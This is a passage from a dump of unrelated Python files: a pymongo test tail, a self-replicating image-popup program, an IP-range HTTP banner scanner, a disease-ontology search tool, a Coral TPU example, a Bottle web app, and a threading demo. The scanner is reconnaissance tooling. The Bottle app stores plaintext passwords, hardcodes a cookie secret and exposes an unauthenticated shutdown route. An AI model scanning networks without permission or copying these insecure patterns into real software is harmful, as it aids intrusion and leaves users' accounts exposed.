{"_id": 8, "item": "abc", "price": 10, "quantity": 5, "date": strptime("2021-03-16T20:20:13Z")}
])
# End Versioned API Example 5
with self.assertRaisesRegex(
OperationFailure, "Provided apiStrict:true, but the command "
"count is not in API Version 1"):
client.db.command('count', 'sales', query={})
# Start Versioned API Example 6
# pymongo.errors.OperationFailure: Provided apiStrict:true, but the command count is not in API Version 1, full error: {'ok': 0.0, 'errmsg': 'Provided apiStrict:true, but the command count is not in API Version 1', 'code': 323, 'codeName': 'APIStrictError'}
# End Versioned API Example 6
# Start Versioned API Example 7
client.db.sales.count_documents({})
# End Versioned API Example 7
# Start Versioned API Example 8
# 8
# End Versioned API Example 8
if __name__ == "__main__":
unittest.main()
|
popup.pyw
|
import os, random as rand, tkinter as tk, time, json, pathlib, webbrowser, ctypes, threading as thread
from tkinter import *
from tkinter import messagebox
from itertools import count, cycle
from PIL import Image, ImageTk
#Start Imported Code
#Code from: https://code.activestate.com/recipes/460509-get-the-actual-and-usable-sizes-of-all-the-monitor/
user = ctypes.windll.user32
class RECT(ctypes.Structure): #rect class for containing monitor info
_fields_ = [
('left', ctypes.c_long),
('top', ctypes.c_long),
('right', ctypes.c_long),
('bottom', ctypes.c_long)
]
def dump(self):
return map(int, (self.left, self.top, self.right, self.bottom))
class MONITORINFO(ctypes.Structure): #not strictly needed here, but kept so the imported recipe does not have to be reworked
_fields_ = [
('cbSize', ctypes.c_ulong),
('rcMonitor', RECT),
('rcWork', RECT),
('dwFlags', ctypes.c_ulong)
]
def get_monitors():
retval = []
CBFUNC = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_ulong, ctypes.c_ulong, ctypes.POINTER(RECT), ctypes.c_double)
def cb(hMonitor, hdcMonitor, lprcMonitor, dwData):
r = lprcMonitor.contents
data = [hMonitor]
data.append(r.dump())
retval.append(data)
return 1
cbfunc = CBFUNC(cb)
temp = user.EnumDisplayMonitors(0, 0, cbfunc, 0)
return retval
def monitor_areas(): #each entry is [hMonitor, monitor rect, work-area rect]; list(entry[2]) gives the (left, top, right, bottom) of the usable work area
retval = []
monitors = get_monitors()
for hMonitor, extents in monitors:
data = [hMonitor]
mi = MONITORINFO()
mi.cbSize = ctypes.sizeof(MONITORINFO)
mi.rcMonitor = RECT()
mi.rcWork = RECT()
res = user.GetMonitorInfoA(hMonitor, ctypes.byref(mi))
data.append(mi.rcMonitor.dump())
data.append(mi.rcWork.dump())
retval.append(data)
return retval
#End Imported Code
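#sketch of the shape of the data returned above (indices inferred from the recipe):
#each monitor_areas() entry is [hMonitor, monitor rect, work-area rect], and each
#rect dumps to (left, top, right, bottom). For example:
#
#   areas = monitor_areas()
#   left, top, right, bottom = list(areas[0][2])   #usable work area of the first monitor
#   width, height = right - left, bottom - top
#
#unborderedWindow() below picks a random entry and derives screenWid/screenHgt the same way.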
allow_scream = True
show_captions = False
has_captions = False
panic_disabled = False
extreme_mode = False
web_open = False
has_lifespan = False
lifespan = 0
web_prob = 0
mitosis_stren = 2
submission_text = 'I Submit <3'
sqLim = 800
panic_key = ''
captions = json.loads('{}')
FADE_OUT_TIME = 1.5
PATH = str(pathlib.Path(__file__).parent.absolute())
os.chdir(PATH)
with open(PATH + '\\config.cfg', 'r') as cfg:
jsonObj = json.loads(cfg.read())
show_captions = int(jsonObj['showCaptions']) == 1
allow_scream = int(jsonObj['promptMod']) == 0
panic_disabled = int(jsonObj['panicDisabled']) == 1
mitosis_enabled = int(jsonObj['mitosisMode']) == 1
web_open = int(jsonObj['webPopup']) == 1
web_prob = int(jsonObj['webMod'])
sqLim = int(jsonObj['squareLim'])
panic_key = jsonObj['panicButton']
has_lifespan = int(jsonObj['timeoutPopups']) == 1
if has_lifespan:
lifespan = int(jsonObj['popupTimeout'])
mitosis_stren = int(jsonObj['mitosisStrength'])
#extreme_mode = int(jsonObj['extremeMode']) == 1
if web_open:
webJsonDat = ''
if os.path.exists(PATH + '\\resource\\web.json'):
with open(PATH + '\\resource\\web.json', 'r') as webF:
webJsonDat = json.loads(webF.read())
hasWeb = len(webJsonDat['urls']) > 0
try:
with open(PATH + '\\resource\\captions.json', 'r') as capF:
captions = json.loads(capF.read())
has_captions = True
try:
submission_text = captions['subtext']
except:
print('will use default submission text')
except:
print('no captions.json')
class GImg(tk.Label):
def load(self, path, rWid, rHgt, delay=75):
self.image = Image.open(path)
self.frames = []
self.delay = delay
try:
for i in count(1):
self.frames.append(ImageTk.PhotoImage(self.image.resize((rWid, rHgt), Image.BOX).copy()))
self.image.seek(i)
except:
print('Done register frames. (' + str(len(self.frames)) + ')')
self.frames_ = cycle(self.frames)
def nextFrame(self):
if self.frames_:
self.config(image=next(self.frames_))
self.after(self.delay, self.nextFrame)
def unborderedWindow():
#var things
arr = os.listdir(os.path.abspath(os.getcwd()) + '\\resource\\img\\')
item = arr[rand.randrange(len(arr))]
while item.split('.')[len(item.split('.')) - 1].lower() == 'ini':
item = arr[rand.randrange(len(arr))]
image = Image.open(os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item)
gif_bool = item.split('.')[len(item.split('.')) - 1].lower() == 'gif'
border_wid_const = 5
monitor_data = monitor_areas()
data_list = list(monitor_data[rand.randrange(0, len(monitor_data))][2])
screenWid = data_list[2] - data_list[0]
screenHgt = data_list[3] - data_list[1]
#window start
root = Tk()
root.bind('<KeyPress>', lambda key: panic(key))
root.configure(bg='black')
root.overrideredirect(1)
root.frame = Frame(root, borderwidth=border_wid_const, relief=RAISED)
root.wm_attributes('-topmost', 1)
#many thanks to @MercyNudes for fixing my old braindead scaling method (https://twitter.com/MercyNudes)
    def bResize(img) -> Image.Image:
        size_source = max(img.width, img.height) / min(screenWid, screenHgt)
        size_target = rand.randint(30, 70) / 100
        resize_factor = size_target / size_source
        return img.resize((int(img.width * resize_factor), int(img.height * resize_factor)), Image.ANTIALIAS)
image = bResize(image)
while(image.height > screenHgt or image.width > screenWid):
image = image.resize((int(image.width*0.75), int(image.height*0.75)), Image.ANTIALIAS)
rImg = image #bResize(image)
image_ = ImageTk.PhotoImage(rImg)
#different handling for gifs vs normal images
if(not gif_bool):
label = Label(root, image=image_, bg='black')
label.grid(row=0, column=0)
else:
label = GImg(root)
label.load(path=os.path.abspath(os.getcwd()) + '\\resource\\img\\' + item, rWid = rImg.width, rHgt = rImg.height)
label.pack()
locX = rand.randint(data_list[0], data_list[2] - (rImg.width))
locY = rand.randint(data_list[1], max(data_list[3] - (rImg.height), 0))
root.geometry('%dx%d+%d+%d' % ((rImg.width), (rImg.height), locX, locY))
if(gif_bool):
label.nextFrame()
if has_lifespan:
thread.Thread(target=lambda: liveLife(root)).start()
if show_captions and has_captions:
capText = selectCaption(item)
if len(capText) > 0:
captionLabel = Label(root, text=capText, wraplength=rImg.width - border_wid_const)
captionLabel.place(x=5, y=5)
subButton = Button(root, text=submission_text, command=die)
subButton.place(x=rImg.width - 5 - subButton.winfo_reqwidth(), y=rImg.height - 5 - subButton.winfo_reqheight())
#disabled for performance
#if allow_scream:
# thread.Thread(target=lambda: scream(root)).start()
root.mainloop()
def liveLife(parent):
time.sleep(lifespan)
for i in range(0, 100):
parent.attributes('-alpha', 1-i/100)
time.sleep(FADE_OUT_TIME / 100)
os.kill(os.getpid(), 9)
def doRoll(mod):
return mod > rand.randint(0, 100)
def urlSelect(arg):
return webJsonDat['urls'][arg] + webJsonDat['args'][arg].split(',')[rand.randrange(len(webJsonDat['args'][arg].split(',')))]
def scream(root):
while True:
time.sleep(rand.randint(1, 3))
root.focus_force()
def die():
if web_open and hasWeb and doRoll((100-web_prob) / 2):
urlPath = urlSelect(rand.randrange(len(webJsonDat['urls'])))
webbrowser.open_new(urlPath)
if mitosis_enabled:
for i in range(0, mitosis_stren):
os.startfile('popup.pyw')
os.kill(os.getpid(), 9)
def selectCaption(strObj):
for obj in captions['prefix']:
if strObj.startswith(obj):
ls = captions[obj]
ls.extend(captions['default'])
return ls[rand.randrange(0, len(captions[obj]))]
return captions['default'][rand.randrange(0, len(captions['default']))] if (len(captions['default']) > 0) else ''
def panic(key):
    if not panic_disabled and (key.keysym == panic_key or key.keycode == panic_key): #the keycode comparison is kept for backwards compatibility with older configs
os.startfile('panic.pyw')
try:
unborderedWindow()
except Exception as e:
messagebox.showerror('Popup Error', 'Could not show popup.\n[' + str(e) + ']')
|
scan_web_banner.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# __author__ = 'Zline'
import requests
import re
from threading import Thread,Lock
import time
import sys
import chardet
import netaddr
import struct
import socket
lock = Lock()
def ip2int(addr):
return struct.unpack("!I", socket.inet_aton(addr))[0]
def int2ip(addr):
return socket.inet_ntoa(struct.pack("!I", addr))
def int_dec(pagehtml):
charset = None
if pagehtml != '':
# print 'use charset dect'
enc = chardet.detect(pagehtml)
# print 'enc= ', enc
if enc['encoding'] and enc['confidence'] > 0.9:
charset = enc['encoding']
if charset == None:
charset_re = re.compile("((^|;)\s*charset\s*=)([^\"']*)", re.M)
charset=charset_re.search(pagehtml[:1000])
charset=charset and charset.group(3) or None
# test charset
try:
if charset:
unicode('test',charset,errors='replace')
except Exception,e:
print 'Exception',e
charset = None
# print 'charset=', charset
return charset
def http_banner(url):
ip=url
try:
url=requests.get(url,timeout=2)
body = url.content
charset = None
if body != '':
charset = int_dec(body)
if charset == None or charset == 'ascii':
charset = 'ISO-8859-1'
if charset and charset != 'ascii' and charset != 'unicode':
try:
body = unicode(body,charset,errors='replace')
except Exception, e:
body = ''
Struts=url.status_code
Server=url.headers['server'][0:13]
if Struts==200 or Struts==403 or Struts==401:
title=re.findall(r"<title>(.*)<\/title>",body)
if len(title):
title = title[0].strip()
else:
title = ''
lock.acquire()
print ('%s\t%d\t%-10s\t%s'%(ip.lstrip('http://'),Struts,Server,title))
lock.release()
except (requests.HTTPError,requests.RequestException,AttributeError,KeyError),e:
pass
if __name__ == '__main__':
if len(sys.argv) >= 2:
ips = sys.argv[1]
else:
print 'usage: python http_banner.py 192.168.1./24 '
print 'usage: python http_banner.py 192.168.1.1-192.168.1.254 '
print 'usage: python http_banner.py 192.168.1./24 8080'
print 'usage: python http_banner.py 192.168.1.1-192.168.1.254 8080'
sys.exit()
port = '80'
if len(sys.argv) == 3:
port = sys.argv[2]
if '-' in ips:
start, end = ips.split('-')
startlong = ip2int(start)
endlong = ip2int(end)
ips = netaddr.IPRange(start,end)
for ip in list(ips):
url='http://%s:%s'%(ip,port)
t = Thread(target=http_banner,args=(url,))
t.daemon=False
t.start()
elif '/' in ips:
ips = netaddr.IPNetwork(ips)
for ip in list(ips):
url='http://%s:%s'%(ip,port)
t = Thread(target=http_banner,args=(url,))
t.daemon=False
t.start()
|
search_engine.py
|
from gensim.models import word2vec, doc2vec
from threading import Thread
from time import sleep
import numpy as np
from wiki_pubmed_fuzzy.ontology import get_ontology
import fuzzywuzzy.process as fuzzy_process
from fuzzywuzzy import fuzz
from wiki_pubmed_fuzzy import wiki
from wiki_pubmed_fuzzy import pubmed
from src_tree.best_vertex import find_best_vertex
from bot.lookup import search_doid
from NLP import nlp
#from xxx import xxx
from bot import lookup
#query_results = None
def fn_get_q(query, names, mode='W'):
if mode == 'W':
scorer=fuzz.WRatio
else:
scorer=fuzz.ratio
try:
global query_results
query_results = fuzzy_process.extractOne(query, names, scorer=scorer)
return True
except:
return False
def fn_get_nlp(syns, names):
try:
global nlp_results
nlp_results=[fuzzy_process.extractOne(syn, names, scorer=fuzz.ratio) for syn in syns]
return True
except:
return False
#wiki_results = None
def fn_get_wiki(query, names):
try:
global wiki_results
header = wiki.get_top_headers(query, 1)[0]
wiki_results = fuzzy_process.extractOne(header, names, scorer=fuzz.ratio)
#sleep(0.1)
return True
except:
return False
#
pubmed_results = None
def fn_get_pubmed(query, names):
global pubmed_results
string = pubmed.get(query, topK=1)
if string is not None:
string = string[0]
pubmed_results = fuzzy_process.extractOne(string, names, scorer=fuzz.partial_ratio)
return True
else:
return False
from graphviz import Digraph
from src_tree.best_vertex import check_parent
def plot(doid,ontology):
dot = Digraph(comment='Neighborhood')
term_doid = ontology.get_term(doid)
label_doid = term_doid.name
dot.node('A', label_doid)
letter = 'A'
if check_parent(doid,ontology) > 0:
dict = {term.name: term.id for term in ontology.get_terms()}
father = dict[term_doid.relationships[0][2]]
term_father = ontology.get_term(father)
label_father = term_father.name
letter = 'B'
dot.node(letter, label_father)
dot.edges([''.join(['B','A'])])
children = [term.id for term in ontology.get_terms() if len(term.relationships) > 0 and term.relationships[0][1] == doid]
#print children
if len(children) > 0:
for child in children:
term_child = ontology.get_term(child)
label_child = term_child.name
letter = chr(ord(letter) + 1)
dot.node(letter, label_child)
dot.edges([''.join(['A',letter])])
return dot
'''main'''
## from bot
query = 'cardiovascular disease'
def find_answer(query, model_trigram, model_doc2vec):
query = query.lower()
# load ontology
ontology = get_ontology('data/doid.obo')
name2doid = {term.name: term.id for term in ontology.get_terms()}
names = name2doid.keys()
doid2name = {term.id: term.name for term in ontology.get_terms()}
## exact match
if query in name2doid.keys():
doid = name2doid[query]
confidence = 100
else:
# no exact match
th_get_q = Thread(target = fn_get_q, args = (query,names,))
th_get_wiki = Thread(target = fn_get_wiki, args = (query,names,))
th_get_pubmed = Thread(target = fn_get_pubmed, args = (query,names,))
th_get_q.start()
th_get_wiki.start()
th_get_pubmed.start()
doids = set()
doid_exact_results = search_doid(query, False, doids)
doids = [d for d in doids if d in doid2name.keys()]
synonyms_nlp = nlp.synonyms(query, model_trigram)
th_get_nlp = Thread(target=fn_get_nlp, args=(synonyms_nlp, names,))
th_get_nlp.start()
best_vertex = find_best_vertex(doids,ontology)
doid = best_vertex
confidence = None
th_get_q.join()
th_get_wiki.join()
th_get_pubmed.join()
th_get_nlp.join()
results = [query_results] + [wiki_results] + [pubmed_results] + nlp_results
d_len = len(doids)
doids = doids + [name2doid[tup[0]] for tup in results]
prob = np.array([tup[1] for tup in results])
prob = np.concatenate((np.ones(d_len)*prob.mean(), prob))
doid = doids[prob.argmax()]
confidence = prob.max()
dot = plot(doid,ontology)
dot.format='png'
graph = dot.render('test-output/round-table.gv', view=False)
string = ("Query: {:}\n".format(query) +
"Name: {:}\n".format(doid2name[doid]) +
"# {:}\n".format(doid) +
"Confidence: {:}%\n".format(confidence))
return string, graph
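# Minimal usage sketch; the model paths and model classes below are assumptions
# (find_answer only requires whatever nlp.synonyms and the downstream code expect):
#
#   model_trigram = word2vec.Word2Vec.load('models/trigram.model')
#   model_doc2vec = doc2vec.Doc2Vec.load('models/doc2vec.model')
#   answer, graph_path = find_answer('cardiovascular disease', model_trigram, model_doc2vec)
#   print(answer)   # graph_path is the rendered PNG of the DOID neighborhood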
|
model_pipelining_classify_image.py
|
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Example to classify a given image using model pipelining with two Edge TPUs.
To run this code, you must attach two Edge TPUs attached to the host and
install the Edge TPU runtime (`libedgetpu.so`) and `tflite_runtime`. For
device setup instructions, see g.co/coral/setup.
Example usage:
```
bash examples/install_requirements.sh model_pipelining_classify_image.py
python3 examples/model_pipelining_classify_image.py \
--models \
test_data/pipeline/inception_v3_299_quant_segment_%d_of_2_edgetpu.tflite \
--labels test_data/imagenet_labels.txt \
--input test_data/parrot.jpg
```
"""
import argparse
import re
import threading
import time
import numpy as np
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
import pycoral.pipeline.pipelined_model_runner as pipeline
from pycoral.utils.dataset import read_label_file
from pycoral.utils.edgetpu import list_edge_tpus
from pycoral.utils.edgetpu import make_interpreter
def _get_devices(num_devices):
"""Returns list of device names in usb:N or pci:N format.
This function prefers returning PCI Edge TPU first.
Args:
num_devices: int, number of devices expected
Returns:
list of devices in pci:N and/or usb:N format
Raises:
RuntimeError: if not enough devices are available
"""
edge_tpus = list_edge_tpus()
if len(edge_tpus) < num_devices:
raise RuntimeError(
'Not enough Edge TPUs detected, expected %d, detected %d.' %
(num_devices, len(edge_tpus)))
num_pci_devices = sum(1 for device in edge_tpus if device['type'] == 'pci')
return ['pci:%d' % i for i in range(min(num_devices, num_pci_devices))] + [
'usb:%d' % i for i in range(max(0, num_devices - num_pci_devices))
]
def _make_runner(model_paths, devices):
"""Constructs PipelinedModelRunner given model paths and devices."""
print('Using devices: ', devices)
print('Using models: ', model_paths)
if len(model_paths) != len(devices):
raise ValueError('# of devices and # of model_paths should match')
interpreters = [make_interpreter(m, d) for m, d in zip(model_paths, devices)]
for interpreter in interpreters:
interpreter.allocate_tensors()
return pipeline.PipelinedModelRunner(interpreters)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-m',
'--models',
required=True,
help=('File path template of .tflite model segments, e.g.,'
'inception_v3_299_quant_segment_%d_of_2_edgetpu.tflite'))
parser.add_argument(
'-i', '--input', required=True, help='Image to be classified.')
parser.add_argument('-l', '--labels', help='File path of labels file.')
parser.add_argument(
'-k',
'--top_k',
type=int,
default=1,
help='Max number of classification results')
parser.add_argument(
'-t',
'--threshold',
type=float,
default=0.0,
help='Classification score threshold')
parser.add_argument(
'-c',
'--count',
type=int,
default=5,
help='Number of times to run inference')
args = parser.parse_args()
labels = read_label_file(args.labels) if args.labels else {}
result = re.search(r'^.*_segment_%d_of_(?P<num_segments>[0-9]+)_.*.tflite',
args.models)
if not result:
raise ValueError(
'--models should follow *_segment%d_of_[num_segments]_*.tflite pattern')
num_segments = int(result.group('num_segments'))
model_paths = [args.models % i for i in range(num_segments)]
devices = _get_devices(num_segments)
runner = _make_runner(model_paths, devices)
size = common.input_size(runner.interpreters()[0])
name = common.input_details(runner.interpreters()[0], 'name')
image = np.array(
Image.open(args.input).convert('RGB').resize(size, Image.ANTIALIAS))
def producer():
for _ in range(args.count):
runner.push({name: image})
runner.push({})
def consumer():
output_details = runner.interpreters()[-1].get_output_details()[0]
scale, zero_point = output_details['quantization']
while True:
result = runner.pop()
if not result:
break
values, = result.values()
scores = scale * (values[0].astype(np.int64) - zero_point)
classes = classify.get_classes_from_scores(scores, args.top_k,
args.threshold)
print('-------RESULTS--------')
for klass in classes:
print('%s: %.5f' % (labels.get(klass.id, klass.id), klass.score))
start = time.perf_counter()
producer_thread = threading.Thread(target=producer)
consumer_thread = threading.Thread(target=consumer)
producer_thread.start()
consumer_thread.start()
producer_thread.join()
consumer_thread.join()
average_time_ms = (time.perf_counter() - start) / args.count * 1000
print('Average inference time (over %d iterations): %.1fms' %
(args.count, average_time_ms))
if __name__ == '__main__':
main()
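# Example invocation (hypothetical file and script names; the model must already be
# split into per-device Edge TPU segments):
#   python3 classify_pipelined.py \
#       --models inception_v3_299_quant_segment_%d_of_2_edgetpu.tflite \
#       --input parrot.jpg --labels imagenet_labels.txt --top_k 3 --count 10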
|
main.py
|
# -*- coding: utf-8 -*-
#qpy:main.py
#qpy:webapp:StoryChain
#qpy:fullscreen
#qpy://localhost:8080
"""
以上代码运行时将会用 WebView 以全屏模式打开 localhost:8080
"""
from bottle import template, request, response, redirect, HTTPResponse
from bottle import Bottle, ServerAdapter
from bottle import debug
import sqlite3
from os import path
from datetime import datetime
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#import androidhelper
#Droid = androidhelper.Android()
# databases
stories = 'storychain.db'
users = 'users.db'
# enable debugging
debug(True)
# create the databases if they do not exist yet
if not path.exists(stories):
import createstorydata
if not path.exists(users):
import createuserdata
root = path.dirname(path.abspath(__file__))
# /newuser and /index: check for a duplicate name
def checkdup(rows, value):
    check = False
    for row in rows:
        print row
        row = row[0]  # each fetched row is a one-element tuple
        if row == value:
            check = True
            break
    return check
# /login: check the user name and password
def check_login(u,p):
    c = 0
    up = (u, p)
    userdata = sqlite3.connect(users)
    uc = userdata.cursor()
    check = False
    uc.execute("SELECT count(count) FROM users")
    maxcount = uc.fetchone()[0]
    while True:
        uc.execute("SELECT userid, password FROM users WHERE count=?", (c,))
        ups = uc.fetchone()
        if c > maxcount:
            break
        elif ups == up:
            check = True
            break
        else:
            c += 1
    userdata.commit()
    return check
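# Note: an equivalent single-query check (sketch only, assuming the same users schema) is:
#   uc.execute("SELECT 1 FROM users WHERE userid=? AND password=?", (u, p))
#   check = uc.fetchone() is not None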
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print "# qpyhttpd stop"
def __exit():
global server
server.stop()
def __ping():
return 'ok'
def index():
user = request.get_cookie('account', secret='somekey')
conn = sqlite3.connect(stories)
cc=conn.cursor()
cc.execute("SELECT title, main FROM chains WHERE count=?", (0,))
ALL = cc.fetchall()
conn.commit()
    temallstory = root+'/allstory'
output = template(temallstory, userid = user, rows = ALL, information='')
if request.GET.get('save'):
user = request.get_cookie('account',secret='somekey')
        if not user:
output = template(temallstory, userid=user, rows = ALL, information='请登录')
else:
newtitle = unicode(request.GET.get('title'))
conn = sqlite3.connect(stories)
cc = conn.cursor()
cc.execute("SELECT title FROM chains")
AllTitle = cc.fetchall()
conn.commit()
if checkdup(AllTitle, newtitle):
output = template(temallstory, userid=user, rows = ALL, information='重名,请重新输入')
return output
else:
newurl='/'+newtitle
redirect (newurl)
if request.GET.get('exit'):
__exit()
return output
def body(name):
    conn = sqlite3.connect(stories)
    cc = conn.cursor()
    t = unicode(name)
    tembody = root+'/body.tpl'
    information = ''
    if request.GET.get('save'):
        user = request.get_cookie('account',secret='somekey')
        if not user:
            information = '请先登录!'
        else:
            new = unicode(request.GET.get('main'))
            currentT = datetime.now()
            ShowT = currentT.strftime('%Y-%m-%d %H:%M:%S')
            cc.execute("SELECT title FROM chains")
            AllTitle = cc.fetchall()
            count = 0
            if checkdup(AllTitle, t):
                cc.execute("SELECT count(count) FROM chains WHERE title=?", (t,))
                x = cc.fetchone()
                count = x[0]
            cc.execute("INSERT INTO chains VALUES(?,?,?,?,?)", (t, count, new, user, ShowT))
            conn.commit()
    cc.execute("SELECT * FROM chains WHERE title=? ORDER BY count", (t,))
    result = cc.fetchall()
    output = template(tembody, rows = result, title=name, information=information)
    return output
def login():
return template(root+'/login', information='')
def do_login():
username = request.forms.get('username')
password = request.forms.get('password')
if check_login(username, password):
response.set_cookie('account',username, secret='somekey')
redirect('/index')
else:
return template(root+'/login', information='登录失败,请确认用户名和密码,或注册新账号')
def newuser(information=''):
    return template(root+'/reg', information=information)
def do_newuser():
username = request.forms.get('username')
password = request.forms.get('password')
confirm = request.forms.get('confirm')
userdata = sqlite3.connect(users)
uc = userdata.cursor()
uc.execute("SELECT userid FROM users")
alluser = uc.fetchall()
if checkdup(alluser, username):
return template(root+'/reg', information='该用户名已存在!')
elif password == confirm:
uc.execute("SELECT count(count) FROM users")
x = uc.fetchone()
        Newcount = x[0]
uc.execute("INSERT INTO users VALUES(?,?,?)",
(Newcount, username, password))
userdata.commit()
redirect('/login')
else:
return template(root+'/reg', information='请确保两次输入的密码相同!')
# MyWSGIRefServer
if __name__ == '__main__':
app = Bottle()
app.route('/')(index)
app.route('/index', method='GET')(index)
app.route('/:name', method='GET')(body)
app.route('/login', method= 'GET')(login)
app.route('/login', method= 'POST')(do_login)
app.route('/newuser', method = 'GET')(newuser)
app.route('/newuser', method = 'POST')(do_newuser)
    app.route('/__exit', method=['GET','HEAD'])(__exit)  # self-termination endpoint
    app.route('/__ping', method=['GET','HEAD'])(__ping)  # health check
try:
server = MyWSGIRefServer(host="localhost", port="8080")
app.run(server=server,reloader=True)
except Exception,ex:
print "Exception: %s" % repr(ex)
|
lock_context_manager.py
|
"""
menggunakan lock/mutex untuk mengsinkronisasi akses ke shared resource
"""
import threading, time, random
counter = 0
lock = threading.Lock()  # lock guarding access to the shared resource
def worker(name):
global counter
for _ in range(10):
        with lock:  # acquire the lock; it is released automatically when the block ends
c = counter # critical code, possible race condition
time.sleep(random.random()) # critical code, possible race condition
counter = c + 1 # critical code, possible race condition
print(f"{name}: {counter}") # critical code, possible race condition
threads = []
for i in ['budi', 'susi', 'iwan']:
thread = threading.Thread(target=worker, args=(i,))
thread.start()
threads.append(thread)
for t in threads:
t.join()
print(f"counter: {counter}")
|
__init__.py
|
# -*- coding: utf-8 -*-
#
import asyncio
from abc import ABCMeta, abstractmethod
import aiohttp
import requests
import json
from pyldapi_client.functions import *
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class LoadedRegister(object):
"""
TODO: Ashley
"""
__slots__ = ('uri', 'item_classes', 'payload')
def __init__(self, uri, item_classes=None, payload=None):
"""
TODO: Ashley
:param uri:
:type uri:
:param item_classes:
:type item_classes:
:param payload:
:type payload:
"""
self.uri = uri
self.item_classes = item_classes or []
self.payload = payload
def get_current_page_details(self):
"""
TODO: Ashley
:return:
:rtype:
"""
page = 1
per_page = 100
first = 1
last = 1
if not self.payload:
return page, per_page, first, last
for p in self.payload:
if "@type" in p and ldp_Page in p['@type']:
page_string = str(p['@id'])
ex_page = extract_page_from_string(page_string)
ex_per_page = extract_per_page_from_string(page_string)
page = ex_page or page
per_page = ex_per_page or per_page
if vocab_first in p and len(p[vocab_first]) > 0:
page_string = p[vocab_first][0]['@id']
ex_first_page = extract_page_from_string(page_string)
first = ex_first_page or first
if vocab_last in p and len(p[vocab_last]) > 0:
page_string = p[vocab_last][0]['@id']
ex_last_page = extract_page_from_string(page_string)
last = ex_last_page or last
break
return page, per_page, first, last
def make_instance_uri(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
if identifier.startswith("http:") or identifier.startswith("https:"):
pass
else:
identifier = "/".join([self.uri.rstrip('/'), identifier])
return identifier
def filter_index(self, payload):
"""
TODO: Ashley
:param payload:
:type payload:
:return:
:rtype:
"""
index = {}
for p in payload:
if "@id" not in p:
continue
if "@type" not in p:
continue
contained = False
for t in p['@type']:
if t in self.item_classes:
contained = True
break
if not contained:
continue
index[p["@id"]] = p
return index
class AbstractBoundIndexPage(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('register', 'index', 'page', 'per_page', 'first', 'last')
def __init__(self, register, index, page, per_page, first, last):
"""
TODO: Ashley
:param register:
:type register:
:param index:
:type index:
:param page:
:type page:
:param per_page:
:type per_page:
:param first:
:type first:
:param last:
:type last:
"""
self.register = register
self.index = index
self.page = page
self.per_page = per_page
self.first = first
self.last = last
def items(self):
"""
TODO: Ashley
:return:
:rtype:
"""
for k, i in self.index.items():
yield k, i
class BoundIndexPage(AbstractBoundIndexPage):
"""
TODO: Ashley
"""
__slots__ = tuple()
def prev_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page == 1 or self.page <= self.first:
return None
index = self.register.index_page(self.page - 1, self.per_page)
return index
def next_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page >= self.last:
return None
index = self.register.index_page(self.page + 1, self.per_page)
return index
class AsyncBoundIndexPage(AbstractBoundIndexPage):
"""
TODO: Ashley
"""
__slots__ = tuple()
async def prev_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page == 1 or self.page <= self.first:
return None
index = await self.register.index_page(self.page - 1, self.per_page)
return index
async def next_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page >= self.last:
return None
index = await self.register.index_page(self.page + 1, self.per_page)
return index
class AbstractBoundRegister(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('register', 'client')
def __init__(self, register, client):
"""
TODO: Ashley
:param register:
:type register:
:param client:
:type client:
"""
self.register = register
self.client = client
class AsyncBoundRegister(AbstractBoundRegister):
"""
TODO: Ashley
"""
__slots__ = tuple()
async def index(self, offset=None, min_count=None):
"""
Gets all of the IDs of instances on this register.
Note: this can take a long time for a large dataset
:return:
:rtype: dict
"""
current_page, current_per_page, first, last =\
self.register.get_current_page_details()
if last < first:
last = first
if last == first and offset is None:
page = await self.index_page(first)
return page.index
if offset and offset > 0:
offset_pages = offset // current_per_page
offset_entries = offset - (offset_pages * current_per_page)
first = first+offset_pages
last = last+offset_pages
else:
offset_entries = 0
# plus 1 because first and last are inclusive.
total_pages = (last - first) + 1
if total_pages < 1:
total_pages = 1
chunks = total_pages // 8
if chunks < 1:
chunks = 1
elif (total_pages % 8) > 0:
chunks += 1
index = {}
for c in range(chunks):
jobs = []
page_offset = c*8
for p in range(page_offset+first, page_offset+first+8):
page_job = self.index_page(page=p)
jobs.append(page_job)
awaitable = asyncio.gather(*jobs, return_exceptions=True)
pages = await awaitable
for p in pages:
if p is None:
continue
elif isinstance(p, Exception):
print(p)
continue
if offset_entries:
skip_entries = sorted(p.index.keys())[:offset_entries]
for s in skip_entries:
_ = p.index.pop(s)
offset_entries = 0
try:
index.update(p.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
async def instances(self, index=None, min_count=None):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
if index is None:
index = await self.index()
if isinstance(index, dict):
index = tuple(index.keys())
instance_count = len(index)
chunks = instance_count // 8
if chunks < 1:
chunks = 1
elif (instance_count % 8) > 0:
chunks += 1
